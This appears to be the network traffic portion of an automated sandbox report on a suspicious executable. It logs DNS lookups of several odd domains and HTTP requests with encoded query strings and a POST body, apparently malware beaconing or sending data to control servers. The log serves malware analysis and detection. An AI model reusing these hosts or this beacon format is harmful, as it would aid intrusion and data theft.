Jan 10, 2025 21:48:08.348999977 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.348999977 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:08.949830055 CET	50028	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:09.968355894 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:09.973295927 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:09.973484993 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:09.983134985 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:09.987931013 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571640968 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571664095 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571676016 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571695089 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571707964 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571718931 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571732044 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571743011 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571755886 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.571969032 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.572015047 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.572015047 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.574074030 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.576853037 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.576865911 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.576877117 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.576889038 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.576988935 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.661165953 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.661215067 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.661256075 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:10.661609888 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.661609888 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.670079947 CET	50029	80	192.168.2.4	162.0.213.94
Jan 10, 2025 21:48:10.677551031 CET	80	50029	162.0.213.94	192.168.2.4
Jan 10, 2025 21:48:15.721927881 CET	50030	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:15.726742029 CET	80	50030	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:15.726829052 CET	50030	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:15.747786045 CET	50030	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:15.752619982 CET	80	50030	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:16.346995115 CET	80	50030	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:16.347023964 CET	80	50030	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:16.347038984 CET	80	50030	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:16.347186089 CET	50030	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:16.347335100 CET	50030	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:17.810291052 CET	50030	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:18.827147007 CET	50031	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:18.832254887 CET	80	50031	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:18.832463980 CET	50031	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:18.847743034 CET	50031	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:18.852617025 CET	80	50031	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:19.461214066 CET	80	50031	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:19.461232901 CET	80	50031	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:19.461296082 CET	50031	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:19.464550972 CET	80	50031	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:19.464626074 CET	50031	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:20.355233908 CET	50031	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:22.030229092 CET	50032	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:22.035140991 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.035223007 CET	50032	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:22.051482916 CET	50032	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:22.056390047 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056427002 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056447983 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056457996 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056467056 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056587934 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056596994 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056667089 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.056677103 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.686919928 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.686939001 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.688278913 CET	50032	80	192.168.2.4	161.97.142.144
Jan 10, 2025 21:48:22.704742908 CET	80	50032	161.97.142.144	192.168.2.4
Jan 10, 2025 21:48:22.705820084 CET	50032	80	192.168.2.4	161.97.142.144

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 21:46:18.647428989 CET	54438	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:46:18.661444902 CET	53	54438	1.1.1.1	192.168.2.4
Jan 10, 2025 21:46:34.437129021 CET	60459	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:46:34.472093105 CET	53	60459	1.1.1.1	192.168.2.4
Jan 10, 2025 21:46:47.816601992 CET	54971	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:46:48.280447960 CET	53	54971	1.1.1.1	192.168.2.4
Jan 10, 2025 21:46:56.444252968 CET	58857	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:46:56.706466913 CET	53	58857	1.1.1.1	192.168.2.4
Jan 10, 2025 21:47:10.985754013 CET	50036	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:47:11.804260015 CET	53	50036	1.1.1.1	192.168.2.4
Jan 10, 2025 21:47:25.390002966 CET	61750	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:47:25.402898073 CET	53	61750	1.1.1.1	192.168.2.4
Jan 10, 2025 21:47:33.593600035 CET	64159	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:47:34.263983011 CET	53	64159	1.1.1.1	192.168.2.4
Jan 10, 2025 21:47:47.717533112 CET	61368	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:47:48.378587008 CET	53	61368	1.1.1.1	192.168.2.4
Jan 10, 2025 21:48:02.267256975 CET	52797	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:48:02.278956890 CET	53	52797	1.1.1.1	192.168.2.4
Jan 10, 2025 21:48:15.688118935 CET	60270	53	192.168.2.4	1.1.1.1
Jan 10, 2025 21:48:15.718734026 CET	53	60270	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 21:46:18.647428989 CET	192.168.2.4	1.1.1.1	0x35e3	Standard query (0)	www.supernutra01.online	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:34.437129021 CET	192.168.2.4	1.1.1.1	0x481b	Standard query (0)	www.prestigerugz.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:47.816601992 CET	192.168.2.4	1.1.1.1	0xfa4d	Standard query (0)	www.buckser.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.444252968 CET	192.168.2.4	1.1.1.1	0x6b6d	Standard query (0)	www.jijievo.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:10.985754013 CET	192.168.2.4	1.1.1.1	0x63f7	Standard query (0)	www.44ynh.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:25.390002966 CET	192.168.2.4	1.1.1.1	0x8b39	Standard query (0)	www.setwayidiomas.online	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:33.593600035 CET	192.168.2.4	1.1.1.1	0x65b8	Standard query (0)	www.75178.club	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:47.717533112 CET	192.168.2.4	1.1.1.1	0x8550	Standard query (0)	www.taxitayninh365.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:48:02.267256975 CET	192.168.2.4	1.1.1.1	0xbcde	Standard query (0)	www.ontherise.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:48:15.688118935 CET	192.168.2.4	1.1.1.1	0x6cdd	Standard query (0)	www.nb-shenshi.buzz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 21:46:18.661444902 CET	1.1.1.1	192.168.2.4	0x35e3	No error (0)	www.supernutra01.online		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:18.661444902 CET	1.1.1.1	192.168.2.4	0x35e3	No error (0)	www.supernutra01.online		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:34.472093105 CET	1.1.1.1	192.168.2.4	0x481b	No error (0)	www.prestigerugz.info		217.160.0.113	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:48.280447960 CET	1.1.1.1	192.168.2.4	0xfa4d	Name error (3)	www.buckser.info	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	www.jijievo.site	all.wjscdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	all.wjscdn.com		154.205.156.26	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	all.wjscdn.com		154.205.159.116	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	all.wjscdn.com		38.54.112.227	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	all.wjscdn.com		154.90.35.240	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	all.wjscdn.com		154.90.58.209	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:46:56.706466913 CET	1.1.1.1	192.168.2.4	0x6b6d	No error (0)	all.wjscdn.com		154.205.143.51	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:11.804260015 CET	1.1.1.1	192.168.2.4	0x63f7	No error (0)	www.44ynh.top	44ynh.top		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:47:11.804260015 CET	1.1.1.1	192.168.2.4	0x63f7	No error (0)	44ynh.top		38.181.21.178	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:25.402898073 CET	1.1.1.1	192.168.2.4	0x8b39	Server failure (2)	www.setwayidiomas.online	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:34.263983011 CET	1.1.1.1	192.168.2.4	0x65b8	No error (0)	www.75178.club	uaslkd.skasdhu.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:47:34.263983011 CET	1.1.1.1	192.168.2.4	0x65b8	No error (0)	uaslkd.skasdhu.huhusddfnsuegcdn.com	gtml.huksa.huhusddfnsuegcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:47:34.263983011 CET	1.1.1.1	192.168.2.4	0x65b8	No error (0)	gtml.huksa.huhusddfnsuegcdn.com		23.167.152.41	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:47:48.378587008 CET	1.1.1.1	192.168.2.4	0x8550	No error (0)	www.taxitayninh365.site	taxitayninh365.site		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:47:48.378587008 CET	1.1.1.1	192.168.2.4	0x8550	No error (0)	taxitayninh365.site		103.75.185.22	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:48:02.278956890 CET	1.1.1.1	192.168.2.4	0xbcde	No error (0)	www.ontherise.top		162.0.213.94	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:48:15.718734026 CET	1.1.1.1	192.168.2.4	0x6cdd	No error (0)	www.nb-shenshi.buzz		161.97.142.144	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.supernutra01.online

www.prestigerugz.info

www.jijievo.site

www.44ynh.top

www.75178.club

www.taxitayninh365.site

www.ontherise.top

www.nb-shenshi.buzz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49783	188.114.97.3	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:18.681493044 CET	480	OUT	GET /q3v1/?Q4DT=n4tTOrYxhN7&blO4h0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= HTTP/1.1 Host: www.supernutra01.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Jan 10, 2025 21:46:19.363774061 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:46:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT Accept-Ranges: bytes cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3IV%2BvhcHUoXpnvqNWeDJpigDjn8mzC6Xr3n2cCmbhpQZYuZKp0%2F2LHHSPAEac4YbjZl%2B0qzpD4sfTlJydkXmh8n4IOkGm7JKxTo1ZXd1VytsV%2FlMmJXkCqfiRlmJfD%2FjOfD4GSMeAQ4wpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff84094d93c3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED] Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before
Jan 10, 2025 21:46:19.363811970 CET	224	IN	Data Raw: 2c 61 2c 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 Data Ascii: ,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}{padding:0;margin:0;border:0},::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320p
Jan 10, 2025 21:46:19.363867044 CET	1236	IN	Data Raw: 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 Data Ascii: x}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}
Jan 10, 2025 21:46:19.363902092 CET	1236	IN	Data Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 37 37 37 37 37 37 37 37 38 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 Data Ascii: ont-weight:500;line-height:1.2777777778}.window-main__title::before{content:"";position:absolute;bottom:0;left:50%;height:2px;width:8rem;background-color:#15b4fc;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.window-main__body{
Jan 10, 2025 21:46:19.363933086 CET	448	IN	Data Raw: 69 6e 66 6f 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 35 36 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 Data Ascii: info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__item{padding-left:.75rem}.window-main__actions{margin-top:1.5rem}}@media (max-width:29.99875em){.window-main .svg-one{top:-330px}.window-main .svg-two{bottom:-423
Jan 10, 2025 21:46:19.363969088 CET	1236	IN	Data Raw: 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 Data Ascii: m + 29.0243902439vw ,8.9375rem)}}@supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.30487
Jan 10, 2025 21:46:19.364017963 CET	1236	IN	Data Raw: 2b 20 32 2e 39 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2e 39 31 34 36 33 34 31 34 36 Data Ascii: + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .
Jan 10, 2025 21:46:19.364053965 CET	1236	IN	Data Raw: 64 69 6e 67 2d 6c 65 66 74 3a 63 61 6c 63 28 2e 35 36 32 35 72 65 6d 20 2b 20 2e 31 32 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 Data Ascii: ding-left:calc(.5625rem + .125*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (p
Jan 10, 2025 21:46:19.364089012 CET	1236	IN	Data Raw: 35 37 2e 31 37 34 20 34 33 30 2e 38 31 34 43 32 33 38 2e 32 20 33 36 34 2e 31 38 20 32 35 30 2e 37 36 31 20 32 38 37 2e 33 36 38 20 32 38 35 2e 32 32 38 20 32 35 39 2e 32 35 43 33 31 39 2e 36 39 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 Data Ascii: 57.174 430.814C238.2 364.18 250.761 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)">
Jan 10, 2025 21:46:19.364123106 CET	328	IN	Data Raw: 67 68 74 3d 22 34 32 36 2e 31 34 32 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 Data Ascii: ght="426.142" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" />
Jan 10, 2025 21:46:19.369108915 CET	1236	IN	Data Raw: 09 3c 2f 66 69 6c 74 65 72 3e 0a 09 09 09 09 09 09 09 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 32 5f 66 5f 32 30 30 31 5f 35 22 20 78 3d 22 35 39 2e 32 39 34 36 22 20 79 3d 22 33 36 2e 30 38 35 36 22 20 77 69 64 74 68 3d 22 35 31 34 Data Ascii: </filter><filter id="filter2_f_2001_5" x="59.2946" y="36.0856" width="514.378" height="571.162" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49880	217.160.0.113	80	3716	C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:46:34.497371912 CET	751	OUT	POST /m5si/ HTTP/1.1 Host: www.prestigerugz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 Origin: http://www.prestigerugz.info Referer: http://www.prestigerugz.info/m5si/ User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0 Data Raw: 62 6c 4f 34 68 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 44 61 2f 43 64 75 4d 77 54 70 51 53 74 73 4d 76 70 62 67 4c 59 75 58 71 45 66 46 47 57 77 46 56 77 3d 3d Data Ascii: blO4h0=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzDa/CduMwTpQStsMvpbgLYuXqEfFGWwFVw==
Jan 10, 2025 21:46:35.150031090 CET	780	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Fri, 10 Jan 2025 20:46:35 GMT Server: Apache X-Frame-Options: deny Content-Encoding: gzip Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED] Data Ascii: 23aTMo@WLP@qzCPZc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <\|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
